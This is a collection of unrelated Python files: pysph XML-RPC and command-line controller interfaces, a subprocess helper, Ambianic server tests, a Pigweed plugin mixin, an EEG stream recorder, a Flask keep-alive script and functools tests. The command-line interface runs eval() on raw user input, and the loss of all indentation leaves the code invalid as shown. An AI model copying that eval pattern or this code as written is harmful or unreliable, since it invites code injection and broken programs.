def add_interface(self, callable):
""" This makes it act as substitute for the actual command_manager """
thr = threading.Thread(target=callable, args=(self.controller,))
thr.daemon = True
thr.start()
return thr
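# Hedged usage sketch (assumption, not part of the original module): connecting to a
# running MultiprocessingInterface and calling the controller proxy. The address,
# authkey and the controller method used below are placeholders.
#
#   if MultiprocessingClient.is_available(('localhost', 8800)):
#       client = MultiprocessingClient(address=('localhost', 8800), authkey='pysph')
#       print(client.controller.get('count'))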
class CrossDomainXMLRPCRequestHandler(SimpleXMLRPCRequestHandler,
SimpleHTTPRequestHandler):
""" SimpleXMLRPCRequestHandler subclass which attempts to do CORS
CORS is Cross-Origin-Resource-Sharing (http://www.w3.org/TR/cors/)
which enables xml-rpc calls from a different domain than the xml-rpc server
(such requests are otherwise denied)
"""
def do_OPTIONS(self):
""" Implement the CORS pre-flighted access for resources """
self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-METHODS", "POST,GET,OPTIONS")
# self.send_header("Access-Control-Max-Age", "60")
self.send_header("Content-length", "0")
self.end_headers()
def do_GET(self):
""" Handle http requests to serve html/image files only """
print(self.path, self.translate_path(self.path))
permitted_extensions = ['.html', '.png', '.svg', '.jpg', '.js']
if not os.path.splitext(self.path)[1] in permitted_extensions:
self.send_error(404, 'File Not Found/Allowed')
else:
SimpleHTTPRequestHandler.do_GET(self)
def end_headers(self):
""" End response header with adding Access-Control-Allow-Origin
This is done to enable CORS request from all clients """
self.send_header("Access-Control-Allow-Origin", "*")
SimpleXMLRPCRequestHandler.end_headers(self)
class XMLRPCInterface(SimpleXMLRPCServer):
""" An XML-RPC interface to the solver controller
Currently cannot work with objects which cannot be marshalled
(which is basically most custom classes, most importantly
ParticleArray and numpy arrays) """
def __init__(self, addr, requestHandler=CrossDomainXMLRPCRequestHandler,
logRequests=True, allow_none=True,
encoding=None, bind_and_activate=True):
SimpleXMLRPCServer.__init__(self, addr, requestHandler, logRequests,
allow_none, encoding, bind_and_activate)
def stop(self):
self.server_close()
def start(self, controller):
self.register_instance(controller, allow_dotted_names=False)
self.register_introspection_functions()
self.serve_forever()
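# Hedged usage sketch (assumption): talking to a running XMLRPCInterface from another
# process with the standard library client. Host, port and the controller method name
# are placeholders.
#
#   import xmlrpc.client
#   proxy = xmlrpc.client.ServerProxy('http://localhost:8900/')
#   print(proxy.get('count'))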
class CommandlineInterface(object):
""" command-line interface to the solver controller """
def start(self, controller):
while True:
try:
try:
inp = raw_input('pysph[%d]>>> ' % controller.get('count'))
except NameError:
inp = input('pysph[%d]>>> ' % controller.get('count'))
cmd = inp.strip().split()
try:
cmd, args = cmd[0], cmd[1:]
except Exception as e:
print('Invalid command')
self.help()
continue
args2 = []
for arg in args:
try:
arg = eval(arg)
except:
pass
finally:
args2.append(arg)
if cmd == 'p' or cmd == 'pause':
controller.pause_on_next()
elif cmd == 'c' or cmd == 'cont':
controller.cont()
elif cmd == 'g' or cmd == 'get':
print(controller.get(args[0]))
elif cmd == 's' or cmd == 'set':
print(controller.set(args[0], args2[1]))
elif cmd == 'q' or cmd == 'quit':
break
else:
print(getattr(controller, cmd)(*args2))
except Exception as e:
self.help()
print(e)
def help(self):
print('''Valid commands are:
p | pause
c | cont
g | get <name>
s | set <name> <value>
q | quit -- quit commandline interface (solver keeps running)''')
|
simple_subprocess.py
|
import subprocess as sys_subprocess
import threading
import io
import sys
class SubprocessFailed(RuntimeError):
def __init__(self, command, returncode):
self.command = command
self.returncode = returncode
def __str__(self):
return (
f"Encoder failed with return code {self.returncode!r}"
f" (command: {self.command!r})"
)
def subprocess(command, input_iterator):
"""Run a subprocess, yield its stdout.
Feeds bytes from input_iterator to the process in a separate thread.
Writes stderr of the process to our own stderr."""
def feeder(proc, input_iterator):
try:
for chunk in input_iterator:
proc.stdin.write(chunk)
except BrokenPipeError:
pass
finally:
proc.stdin.close()
def stderr_reader(proc):
while True:
block = proc.stderr.read(io.DEFAULT_BUFFER_SIZE)
if not block:
break
else:
sys.stderr.write(block.decode("utf-8"))
proc = sys_subprocess.Popen(
command,
bufsize=0,
stdout=sys_subprocess.PIPE,
stdin=sys_subprocess.PIPE,
stderr=sys_subprocess.PIPE,
)
try:
stdin_thread = threading.Thread(target=feeder, args=(proc, input_iterator))
stdin_thread.start()
stderr_thread = threading.Thread(target=stderr_reader, args=(proc,))
stderr_thread.start()
while True:
block = proc.stdout.read(io.DEFAULT_BUFFER_SIZE)
if not block:
break
else:
yield block
finally:
if proc.poll() is None:
proc.terminate()
try:
proc.wait(3)
except sys_subprocess.TimeoutExpired:
proc.kill()
if proc.returncode != 0:
stderr_thread.join(3)
raise SubprocessFailed(command, proc.returncode)
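# Hedged usage sketch (assumption): piping chunks through an external encoder and
# consuming its stdout. `gzip -c` is only an example command; any filter that reads
# stdin and writes stdout would do.
#
#   def chunks():
#       for i in range(10):
#           yield f"line {i}\n".encode()
#
#   compressed = b"".join(subprocess(["gzip", "-c"], chunks()))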
|
test_startup.py
|
import os
import signal
import threading
import time
from pathlib import Path
import ambianic
import pytest
from ambianic import __main__, config, load_config
from ambianic.server import AmbianicServer
from ambianic.util import ManagedService, ServiceExit
@pytest.fixture
def my_dir():
return os.path.dirname(os.path.abspath(__file__))
def test_no_work_dir():
with pytest.raises(AssertionError):
AmbianicServer(work_dir=None)
def test_bad_work_dir():
srv = AmbianicServer(work_dir="/_/_/_dir_does_not_exist___")
with pytest.raises(AssertionError):
srv.start()
class MockAmbianicServer(AmbianicServer):
def __init__(self, work_dir=None, heartbeat_flag=None):
super().__init__(work_dir)
self._heartbeat_flag = heartbeat_flag
self._main_heartbeat_logged = False
self.config_changed = False
def _heartbeat(self):
super()._heartbeat()
if self._heartbeat_flag:
self._heartbeat_flag.set()
def _log_heartbeat(self):
super()._log_heartbeat()
self._main_heartbeat_logged = True
def dispatch(self, event):
super().dispatch(event)
self.config_changed = True
def _start_mock_server(**kwargs):
srv = MockAmbianicServer(**kwargs)
t = threading.Thread(target=srv.start, daemon=True)
t.start()
return (srv, t)
def _stop_mock_server(server=None, thread=None):
assert server
assert thread
server.stop()
thread.join(timeout=10)
assert not thread.is_alive()
def test_no_pipelines(my_dir):
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), clean=True)
assert config.get("pipelines") is None
hb_flag = threading.Event()
srv, t = None, None
try:
srv, t = _start_mock_server(work_dir=my_dir, heartbeat_flag=hb_flag)
assert srv
assert t
hb_flag.wait(timeout=3)
assert hb_flag.is_set()
pps = srv._servers["pipelines"]
assert isinstance(pps, ambianic.pipeline.interpreter.PipelineServer)
assert not pps.pipeline_server_job.job._pipelines
finally:
_stop_mock_server(server=srv, thread=t)
def test_main(my_dir):
os.environ["AMBIANIC_DIR"] = my_dir
config.clean()
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), clean=True)
t = threading.Thread(target=__main__.main, daemon=True)
t.start()
t.join(timeout=1)
__main__.stop()
t.join(timeout=3)
assert not t.is_alive()
def test_system_shutdown_signal():
with pytest.raises(ServiceExit):
__main__._service_shutdown(signum=signal.SIGINT, frame=None)
class _BadPipelineServer(ManagedService):
def __init__(self, config=None, **kwargs):
super().__init__(**kwargs)
self._heal_called = False
def healthcheck(self):
super().healthcheck()
# return an old enough heartbeat time to trigger a health concern
latest_heartbeat = (
time.monotonic() - ambianic.server.MANAGED_SERVICE_HEARTBEAT_THRESHOLD - 10
)
print(f"_BadPipelineServer latest_heartbeat - now: {latest_heartbeat}")
return latest_heartbeat, "BAD"
def heal(self):
super().heal()
self._heal_called = True
def test_heartbeat_threshold(my_dir):
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), clean=True)
# replace default with test pipeline server
# remove all root servers which we won't test here
ambianic.server.ROOT_SERVERS.clear()
ambianic.server.ROOT_SERVERS["pipelines"] = _BadPipelineServer
srv, t = _start_mock_server(work_dir=my_dir)
t.join(timeout=2)
pps = srv._servers["pipelines"]
assert isinstance(pps, _BadPipelineServer)
assert pps._heal_called
_stop_mock_server(server=srv, thread=t)
def test_main_heartbeat_log(my_dir):
load_config(os.path.join(my_dir, "test-config-no-pipelines.yaml"), True)
# remove all root servers which we will not test here
ambianic.server.ROOT_SERVERS.clear()
# set heartbeat log interval to a small enough
# interval so the test passes faster
ambianic.server.MAIN_HEARTBEAT_LOG_INTERVAL = 0.1
srv, t = _start_mock_server(work_dir=my_dir)
t.join(timeout=2)
assert srv._main_heartbeat_logged
_stop_mock_server(server=srv, thread=t)
def test_config_change(my_dir):
config_file = os.path.join(my_dir, "test-config-no-pipelines.yaml")
load_config(config_file, True)
hb_flag = threading.Event()
srv, t = None, None
try:
srv, t = _start_mock_server(work_dir=my_dir, heartbeat_flag=hb_flag)
hb_flag.wait(timeout=3)
Path(config_file).touch()
time.sleep(3)
assert hb_flag.is_set()
assert srv.config_changed
finally:
_stop_mock_server(server=srv, thread=t)
|
plugin_mixin.py
|
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Window pane base class."""
import asyncio
import logging
from threading import Thread
import time
from typing import Callable, Optional
from pw_console.get_pw_console_app import get_pw_console_app
class PluginMixin:
"""Handles background task management in a Pigweed Console plugin.
Pigweed Console plugins can inherit from this class if they require running
tasks in the background. This is important as any plugin code not in its
own dedicated thread can potentially block the user interface
Example usage: ::
import logging
from pw_console.plugin_mixin import PluginMixin
from pw_console.widgets import WindowPaneToolbar
class AwesomeToolbar(WindowPaneToolbar, PluginMixin):
TOOLBAR_HEIGHT = 1
def __init__(self, *args, **kwargs):
# Call parent class WindowPaneToolbar.__init__
super().__init__(*args, **kwargs)
# Set PluginMixin to execute
# self._awesome_background_task every 10 seconds.
self.plugin_init(
plugin_callback=self._awesome_background_task,
plugin_callback_frequency=10.0,
plugin_logger_name='awesome_toolbar_plugin')
# This function will be run in a separate thread every 10 seconds.
def _awesome_background_task(self) -> bool:
time.sleep(1) # Do real work here.
if self.new_data_processed:
# If new data was processed, and the user interface
# should be updated return True.
# Log using self.plugin_logger for debugging.
self.plugin_logger.debug('New data processed')
# Return True to signal a UI redraw.
return True
# Returning False means no updates needed.
return False
Attributes:
plugin_callback: Callable that is run in a background thread.
plugin_callback_frequency: Number of seconds to wait between
executing plugin_callback.
plugin_logger: logging instance for this plugin. Useful for debugging
code running in a separate thread.
plugin_callback_future: `Future`_ object for the plugin background task.
plugin_event_loop: asyncio event loop running in the background thread.
plugin_enable_background_task: If True, keep periodically running
plugin_callback at the desired frequency. If False the background
task will stop.
.. _Future: https://docs.python.org/3/library/asyncio-future.html
"""
def plugin_init(
self,
plugin_callback: Optional[Callable[..., bool]] = None,
plugin_callback_frequency: float = 30.0,
plugin_logger_name: Optional[str] = 'pw_console_plugins',
) -> None:
"""Call this on __init__() to set plugin background task variables.
Args:
plugin_callback: Callable to run in a separate thread from the
Pigweed Console UI. This function should return True if the UI
should be redrawn after execution.
plugin_callback_frequency: Number of seconds to wait between
executing plugin_callback.
plugin_logger_name: Unique name for this plugin's Python
logger. Useful for debugging code running in a separate thread.
"""
self.plugin_callback = plugin_callback
self.plugin_callback_frequency = plugin_callback_frequency
self.plugin_logger = logging.getLogger(plugin_logger_name)
self.plugin_callback_future = None
# Event loop for executing plugin code.
self.plugin_event_loop = asyncio.new_event_loop()
self.plugin_enable_background_task = True
def plugin_start(self):
"""Function used to start this plugin's background thead and task."""
# Create an entry point for the plugin thread.
def _plugin_thread_entry():
# Disable log propagation
self.plugin_logger.propagate = False
asyncio.set_event_loop(self.plugin_event_loop)
self.plugin_event_loop.run_forever()
# Create a thread for running user code so the UI isn't blocked.
thread = Thread(target=_plugin_thread_entry, args=(), daemon=True)
thread.start()
self.plugin_logger.debug('Starting plugin: %s', self)
if self.plugin_callback is None:
return
self.plugin_enable_background_task = True
self.plugin_callback_future = asyncio.run_coroutine_threadsafe(
# This function will be executed in a separate thread.
self._plugin_periodically_run_callback(),
# Using this asyncio event loop.
self.plugin_event_loop) # type: ignore
def plugin_stop(self):
self.plugin_enable_background_task = False
async def _plugin_periodically_run_callback(self) -> None:
while self.plugin_enable_background_task:
start_time = time.time()
# Run the callback and redraw the UI if return value is True
if self.plugin_callback and self.plugin_callback():
get_pw_console_app().redraw_ui()
run_time = time.time() - start_time
await asyncio.sleep(self.plugin_callback_frequency - run_time)
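# A minimal lifecycle sketch (illustrative only; ``MyToolbar`` is a hypothetical
# plugin class that inherits PluginMixin and has already called plugin_init()):
#
#   toolbar = MyToolbar()
#   toolbar.plugin_start()   # spawns the background thread and schedules the callback
#   ...                      # plugin_callback now runs every plugin_callback_frequency seconds
#   toolbar.plugin_stop()    # the periodic coroutine exits after its current iteration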
|
streamRecorder.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 16 22:07:08 2018
@author: Alexis
A variation of streamListener, better suited to recording and asynchronous protocols
"""
from pylsl import StreamInlet, resolve_streams
import streamError
import threading as th
import numpy as np
import time
import math
from collections import deque
from databaseManager import Signal  # for SignalRecorder
class StreamRecorder:
def __init__(self, streamName, streamType):
self._inlet = None
self._recording = False
self._recordlength = 0
self.ts = 0
self.offset = 0
self._buffer = None
self.streamType = streamType
self.streamName = streamName
self.th = th.Thread()
self._deque = deque([])
self._fps = deque([])
def connect(self):
'''Connects the stream listener to the stream matching streamType and streamName.
Returns whether a stream was found. May raise a NameError.
Adapted from the previous PSC group's code.'''
streams = resolve_streams()
for stream in streams: # search the incoming streams for the one coming from NIC
if (stream.name() == self.streamName and stream.type() == self.streamType):
self._inlet = StreamInlet(stream, 3) # keep the stream in memory as "inlet"
self.offset = time.time() - self._inlet.pull_sample()[1]
return True
return False
def isRecording(self):
return self._recording
def getRecord(self):
if(self.isRecording()):
raise streamError.RecordingSreamError()
else:
return self._buffer
def getBuffer(self):
return self._buffer
def bufferAvailable(self):
if self._buffer is None:
return False
return True
def startRecord(self, ts, length):
'''Starts a recording of length seconds, beginning at timestamp ts, in a separate thread.'''
if self._recording:
raise streamError.RecordingSreamError()
if self._inlet is None:
raise streamError.UnConnctedStreamError("recording")
self._recording = True
self._recordlength = length
self.ts = ts
self.th = th.Thread(target = self._record)
self.th.start()
def _record(self):
times = []
samples = []
while self._recording:
s,t = self._inlet.pull_chunk(0.0)
i = len(t) - 1
i2 = 0
if i >= 0 and t[i] + self.offset >= self.ts:
while i - i2 > 1:
med = t[math.ceil((i + i2)/2)] + self.offset
if med > self.ts:
i = (i + i2)//2
else:
i2 = math.ceil((i + i2)/2)
times += t[i:]
samples += s[i:]
break
time.sleep(0.2)
while self._recording:
s, t = self._inlet.pull_chunk(0.0)
if len(t) and t[-1] + self.offset >= self.ts + self._recordlength:
i = len(t) - 1
i2 = 0
while i - i2 > 1:
med = t[math.ceil((i + i2)/2)] + self.offset
if med > self.ts + self._recordlength:
i = (i + i2)//2
else:
i2 = math.ceil((i + i2)/2)
times += t[:i]
samples += s[:i]
break
else:
times += t
samples += s
time.sleep(0.2)
self._buffer = np.concatenate((np.array([times]) + (self.offset - self.ts), np.array(samples).T ))
self._recording = False
def stopRecord(self):
self._recording = False
if self.th:
while self.th.is_alive():
time.sleep(0.01)
self._buffer = None
def listen(self, nbData):
self.stopRecord()
self._deque = deque([], nbData)
self._recording = True
self.th = th.Thread(target=self.mainloop)
self.th.start()
def mainloop(self):
while self._recording:
self._actualizeData()
self._makeBuffer()
self._fps.append(time.time())
while len(self._fps) > 0 and self._fps[-1] - self._fps[0] > 1.0:
self._fps.popleft()
def _actualizeData(self):
'''Fetches the newly available data.'''
if self._inlet is None:
raise streamError.UnConnctedStreamError(" fetch data ")
while True:
sample, timestamp = self._inlet.pull_sample(0.0) # 8 electrodes + timestamp
if sample is None:
break
sample.insert(0, timestamp)
self._deque.append(sample)
def _makeBuffer(self):
if len(self._deque) == 0:
self._buffer = np.empty((0, 0))  # no samples yet: expose an empty buffer
return
buffer = np.empty((len(self._deque[0]), len(self._deque)))
i = 0
for s in self._deque:
j = 0
for x in s:
buffer[j, i] = x
j += 1
i += 1
self._buffer = buffer
class SignalRecorder(StreamRecorder):
def __init__(self, streamName, streamType):
StreamRecorder.__init__(self, streamName, streamType)
self.info = None
def startRecordSignal(self, ts, length, info):
self.info = info.copy()
self.startRecord(ts, length)
def getSignal(self):
return Signal(self.getRecord(), self.info)
class QualitySignalRecorder(SignalRecorder):
def __init__(self, streamName, streamType, streamTypes):
SignalRecorder.__init__(self, streamName, streamType)
self.info = None
self._qualities = [StreamRecorder(streamName, s) for s in streamTypes]
def startRecordSignal(self, ts, length, info):
SignalRecorder.startRecordSignal(self, ts, length, info)
for s in self._qualities:
s.startRecord(ts, length)
def stopRecord(self):
SignalRecorder.stopRecord(self)
for s in self._qualities:
s.stopRecord()
def connect(self):
b = SignalRecorder.connect(self)
for s in self._qualities:
s.connect()
return b
def getSignal(self):
return Signal(self.getRecord(), self.info, [s.getRecord() for s in self._qualities])
def isRecording(self):
for s in self._qualities:
if s.isRecording():
return True
return StreamRecorder.isRecording(self)
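# Illustrative usage sketch (the stream name "NIC" and type "EEG" are assumptions;
# substitute whatever LSL outlet is actually running):
#
#   rec = StreamRecorder("NIC", "EEG")
#   if rec.connect():
#       rec.startRecord(ts=time.time(), length=5.0)   # record 5 s starting now
#       while rec.isRecording():
#           time.sleep(0.1)
#       data = rec.getRecord()   # row 0 holds timestamps, remaining rows the channels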
|
keep_alive.py
|
# Converts the repl into a web server,
# which allows the bot to stay alive.
# CREDITS TO BEAU FROM FREECODECAMP FOR THIS ONE
# https://www.youtube.com/watch?v=SPTfmiYiuok
from flask import Flask
from threading import Thread
app = Flask("")
@app.route("/")
def home():
return "<h1>Cosette Bot is alive</h1>"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
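# Typical usage from the bot's entry point (illustrative; ``bot`` and ``TOKEN`` are
# placeholders for whatever Discord client and secret this repl actually uses):
#
#   from keep_alive import keep_alive
#
#   keep_alive()      # start the Flask server in a background thread on port 8080
#   bot.run(TOKEN)    # then start the bot; the web server keeps the repl awake when pinged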
|
test_functools.py
|
# import abc
# import builtins
# import collections
# import collections.abc
import copy
from itertools import permutations, chain
# import pickle
from random import choice
import sys
# from test import support
# import threading
import time
# import typing
import unittest
# import unittest.mock
# import os
# from weakref import proxy
# import contextlib
# from test.support.script_helper import assert_python_ok
import functools
# py_functools = support.import_fresh_module('functools', blocked=['_functools'])
# c_functools = support.import_fresh_module('functools', fresh=['_functools'])
py_functools = functools
c_functools = functools
# decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
# @contextlib.contextmanager
# def replaced_module(name, replacement):
# original_module = sys.modules[name]
# sys.modules[name] = replacement
# try:
# yield
# finally:
# sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
# def test_weakref(self):
# f = self.partial(int, base=16)
# p = proxy(f)
# self.assertEqual(f.func, p.func)
# f = None
# self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format(**kwargs),
'b={b!r}, a={a!r}'.format(**kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
# def test_recursive_repr(self):
# if self.partial in (c_functools.partial, py_functools.partial):
# name = 'functools.partial'
# else:
# name = self.partial.__name__
# f = self.partial(capture)
# f.__setstate__((f, (), {}, {}))
# try:
# self.assertEqual(repr(f), '%s(...)' % (name,))
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (f,), {}, {}))
# try:
# self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (), {'a': f}, {}))
# try:
# self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
# finally:
# f.__setstate__((capture, (), {}, {}))
# def test_pickle(self):
# with self.AllowPickle():
# f = self.partial(signature, ['asdf'], bar=[True])
# f.attr = []
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# f_copy = pickle.loads(pickle.dumps(f, proto))
# self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
# def test_deepcopy(self):
# f = self.partial(signature, ['asdf'], bar=[True])
# f.attr = []
# f_copy = copy.deepcopy(f)
# self.assertEqual(signature(f_copy), signature(f))
# self.assertIsNot(f_copy.attr, f.attr)
# self.assertIsNot(f_copy.args, f.args)
# self.assertIsNot(f_copy.args[0], f.args[0])
# self.assertIsNot(f_copy.keywords, f.keywords)
# self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
# def test_setstate(self):
# f = self.partial(signature)
# f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
# self.assertEqual(signature(f),
# (capture, (1,), dict(a=10), dict(attr=[])))
# self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
# f.__setstate__((capture, (1,), dict(a=10), None))
# self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
# self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
# f.__setstate__((capture, (1,), None, None))
# #self.assertEqual(signature(f), (capture, (1,), {}, {}))
# self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
# self.assertEqual(f(2), ((1, 2), {}))
# self.assertEqual(f(), ((1,), {}))
# f.__setstate__((capture, (), {}, None))
# self.assertEqual(signature(f), (capture, (), {}, {}))
# self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
# self.assertEqual(f(2), ((2,), {}))
# self.assertEqual(f(), ((), {}))
# def test_setstate_errors(self):
# f = self.partial(signature)
# self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
# self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
# self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
# self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
# self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
# self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
# self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
# def test_setstate_subclasses(self):
# f = self.partial(signature)
# f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
# s = signature(f)
# self.assertEqual(s, (capture, (1,), dict(a=10), {}))
# self.assertIs(type(s[1]), tuple)
# self.assertIs(type(s[2]), dict)
# r = f()
# self.assertEqual(r, ((1,), {'a': 10}))
# self.assertIs(type(r[0]), tuple)
# self.assertIs(type(r[1]), dict)
# f.__setstate__((capture, BadTuple((1,)), {}, None))
# s = signature(f)
# self.assertEqual(s, (capture, (1,), {}, {}))
# self.assertIs(type(s[1]), tuple)
# r = f(2)
# self.assertEqual(r, ((1, 2), {}))
# self.assertIs(type(r[0]), tuple)
# def test_recursive_pickle(self):
# with self.AllowPickle():
# f = self.partial(capture)
# f.__setstate__((f, (), {}, {}))
# try:
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# with self.assertRaises(RecursionError):
# pickle.dumps(f, proto)
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (f,), {}, {}))
# try:
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# f_copy = pickle.loads(pickle.dumps(f, proto))
# try:
# self.assertIs(f_copy.args[0], f_copy)
# finally:
# f_copy.__setstate__((capture, (), {}, {}))
# finally:
# f.__setstate__((capture, (), {}, {}))
# f = self.partial(capture)
# f.__setstate__((capture, (), {'a': f}, {}))
# try:
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# f_copy = pickle.loads(pickle.dumps(f, proto))
# try:
# self.assertIs(f_copy.keywords['a'], f_copy)
# finally:
# f_copy.__setstate__((capture, (), {}, {}))
# finally:
# f.__setstate__((capture, (), {}, {}))
# # Issue 6083: Reference counting bug
# def test_setstate_refcount(self):
# class BadSequence:
# def __len__(self):
# return 4
# def __getitem__(self, key):
# if key == 0:
# return max
# elif key == 1:
# return tuple(range(1000000))
# elif key in (2, 3):
# return {}
# raise IndexError
# f = self.partial(object)
# self.assertRaises(TypeError, f.__setstate__, BadSequence())
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
